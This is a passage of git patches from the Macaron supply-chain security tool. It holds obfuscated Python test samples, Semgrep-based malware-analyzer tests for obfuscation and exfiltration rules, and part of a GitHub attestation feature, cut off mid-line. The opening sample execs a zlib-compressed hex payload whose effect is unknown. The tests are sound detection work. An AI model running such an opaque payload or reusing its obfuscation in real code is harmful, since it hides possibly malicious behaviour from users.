__OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' + + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763bc5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a57518088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d75ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..15394e232 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,290 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock, patch + +import pytest +import yaml + +from macaron import MACARON_PATH +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + + +def get_rule_ids_list(path: str) -> set[str]: + """ + Extract a set of Semgrep rule IDs from a .yaml file. + + Parameters + ---------- + path: str + the path to the .yaml file to read. + """ + with open(path, encoding="utf8") as semgrep_yaml: + ruleset: dict[str, list] = yaml.safe_load(semgrep_yaml.read()) + return {rule["id"] for rule in ruleset["rules"]} + + +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: None) if section == "heuristic.pypi" else None + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + # Make sure the empty string is not considered as a path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: "") if section == "heuristic.pypi" else None + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + defaults = { + "custom_semgrep_rules_path": "some_random_path", + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error,""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + defaults = { + "custom_semgrep_rules_path": os.path.abspath(__file__), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: + """Test the default Semgrep rulesets on code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + + # Test with none of the defaults.ini settings used, to ensure this ruleset is run + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: None) if section == "heuristic.pypi" else None + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_custom_rules(mock_defaults: MagicMock, pypi_package_json: MagicMock) -> None: + """Test that custom rulesets are properly run and appear in output detections""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + custom_rule_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml") + expected_ids = get_rule_ids_list(custom_rule_path) + + defaults = { + "custom_semgrep_rules_path": custom_rule_path, + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["enabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["enabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["enabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("defaults", "list_keys", "rulefile_path"), + [ + pytest.param( + {"disabled_default_rulesets": "obfuscation"}, + {"disabled_default_rulesets"}, + os.path.join(RESOURCES_PATH, "pypi_malware_rules", "obfuscation.yaml"), + id="test_disable_default_ruleset", + ), + pytest.param( + { + "disabled_custom_rulesets": "custom_sample", + "custom_semgrep_rules_path": os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources"), + }, + {"disabled_custom_rulesets"}, + os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml"), + id="test_disable_custom_ruleset", + ), + ], +) +def test_disabling_rulesets( + mock_defaults: MagicMock, + pypi_package_json: MagicMock, + defaults: dict[str, str], + list_keys: set[str], + rulefile_path: str, +) -> None: + """Test that rulesets can be disabled""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + + expected_ids = get_rule_ids_list(rulefile_path) + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + [x.strip() for x in defaults[option].split("\n") if x.strip()] + if section == "heuristic.pypi" and option in list_keys + else None + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["disabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["disabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["disabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_unknown_ruleset_exclusions(mock_defaults: MagicMock) -> None: + """Test when there are ruleset names supplied to be disabled that don't exist""" + defaults = { + "disabled_custom_rulesets": "custom_sample\ndoes_not_exist", + "custom_semgrep_rules_path": os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources"), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + [x.strip() for x in defaults[option].split("\n") if x.strip()] + if section == "heuristic.pypi" and option == "disabled_custom_rulesets" + else None + ) + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_disabling_rules(mock_defaults: MagicMock, pypi_package_json: MagicMock) -> None: + """Test individual rules can be disabled""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + custom_rule_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml") + expected_ids = {"custom_sample_1", "exfiltration_remote-exfiltration"} + + defaults: dict[str, str] = { + "custom_semgrep_rules_path": custom_rule_path, + "disabled_rules": "\n".join(expected_ids), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + list(expected_ids) if section == "heuristic.pypi" and option == "disabled_rules" else None + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["disabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["disabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["disabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..fe7c2f701 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 +7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,20 +24,32 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "sourcecode_analysis"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. - ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. + pytest.param( + "pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_sourcecode_analysis_malicious_pypi_package" + ), ], ) def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + sourcecode_analysis: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +58,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if sourcecode_analysis: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: @@ -129,5 +147,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type] From d6134add6883d37ed8e3202c9085072767d6f1e7 Mon Sep 17 00:00:00 2001 From: Ben Selwyn-Smith Date: Wed, 4 Jun 2025 16:26:13 +1000 Subject: [PATCH 06/14] feat: add GitHub attestation discovery (#1020) This PR allows Macaron to discover GitHub attestation. To retrieve these attestations, the SHA256 hash of the related artefact is required. Hashes are computed from local artefact files if available, or from downloaded ones otherwise. Signed-off-by: Ben Selwyn-Smith --- src/macaron/artifact/local_artifact.py | 60 +++++- src/macaron/artifact/maven.py | 21 +- .../sourcecode/suspicious_setup.py | 2 +- src/macaron/repo_finder/repo_finder.py | 7 +- src/macaron/repo_finder/repo_finder_pypi.py | 39 ++-- src/macaron/slsa_analyzer/analyzer.py | 188 ++++++++++++++++-- .../checks/build_script_check.py | 4 - .../checks/detect_malicious_metadata_check.py | 33 ++- .../checks/provenance_commit_check.py | 4 - .../checks/provenance_repo_check.py | 4 + .../slsa_analyzer/git_service/api_client.py | 21 +- .../maven_central_registry.py | 83 +++++++- .../package_registry/package_registry.py | 4 +- .../package_registry/pypi_registry.py | 115 ++++++++++- .../slsa_analyzer/provenance/loader.py | 26 ++- tests/artifact/test_local_artifact.py | 20 ++ tests/artifact/test_maven.py | 15 +- .../cases/github_maven_attestation/policy.dl | 10 + .../cases/github_maven_attestation/test.yaml | 22 ++ .../github_maven_attestation_local/policy.dl | 10 + .../github_maven_attestation_local/test.yaml | 30 +++ .../cases/github_pypi_attestation/policy.dl | 10 + .../cases/github_pypi_attestation/test.yaml | 20 ++ .../test_maven_central_registry.py | 113 +++++++---- 24 files changed, 742 insertions(+), 119 deletions(-) create mode 100644 tests/integration/cases/github_maven_attestation/policy.dl create mode 100644 tests/integration/cases/github_maven_attestation/test.yaml create mode 100644 tests/integration/cases/github_maven_attestation_local/policy.dl create mode 100644 tests/integration/cases/github_maven_attestation_local/test.yaml create mode 100644 tests/integration/cases/github_pypi_attestation/policy.dl create mode 100644 tests/integration/cases/github_pypi_attestation/test.yaml diff --git a/src/macaron/artifact/local_artifact.py b/src/macaron/artifact/local_artifact.py index ed37c335a..0df7e6248 100644 --- a/src/macaron/artifact/local_artifact.py +++ b/src/macaron/artifact/local_artifact.py @@ -1,17 +1,21 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module declares types and utilities for handling local artifacts.""" import fnmatch import glob +import hashlib +import logging import os from packageurl import PackageURL -from macaron.artifact.maven import construct_maven_repository_path +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.errors import LocalArtifactFinderError +logger: logging.Logger = logging.getLogger(__name__) + def construct_local_artifact_dirs_glob_pattern_maven_purl(maven_purl: PackageURL) -> list[str] | None: """Return a list of glob pattern(s) representing the directory that contains the local maven artifacts for ``maven_purl``. @@ -247,3 +251,55 @@ def get_local_artifact_dirs( ) raise LocalArtifactFinderError(f"Unsupported PURL type {purl_type}") + + +def get_local_artifact_hash(purl: PackageURL, artifact_dirs: list[str]) -> str | None: + """Compute the hash of the local artifact. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact being sought. + artifact_dirs: list[str] + The list of directories that may contain the artifact file. + + Returns + ------- + str | None + The hash, or None if not found. + """ + if not artifact_dirs: + logger.debug("No artifact directories provided.") + return None + + if not purl.version: + logger.debug("PURL is missing version.") + return None + + artifact_target = None + if purl.type == "maven": + artifact_target = construct_primary_jar_file_name(purl) + + # TODO add support for other PURL types here. + # Other purl types can be easily supported if user provided artifacts are accepted from the command line. + # See https://github.com/oracle/macaron/issues/498. + + if not artifact_target: + logger.debug("PURL type not supported: %s", purl.type) + return None + + for artifact_dir in artifact_dirs: + full_path = os.path.join(artifact_dir, artifact_target) + if not os.path.exists(full_path): + continue + + with open(full_path, "rb") as file: + try: + hash_result = hashlib.file_digest(file, "sha256") + except ValueError as error: + logger.debug("Error while hashing file: %s", error) + continue + + return hash_result.hexdigest() + + return None diff --git a/src/macaron/artifact/maven.py b/src/macaron/artifact/maven.py index dd97431f7..8b9b0721c 100644 --- a/src/macaron/artifact/maven.py +++ b/src/macaron/artifact/maven.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module declares types and utilities for Maven artifacts.""" @@ -196,3 +196,22 @@ def construct_maven_repository_path( if asset_name: path = "/".join([path, asset_name]) return path + + +def construct_primary_jar_file_name(purl: PackageURL) -> str | None: + """Return the name of the primary JAR for the 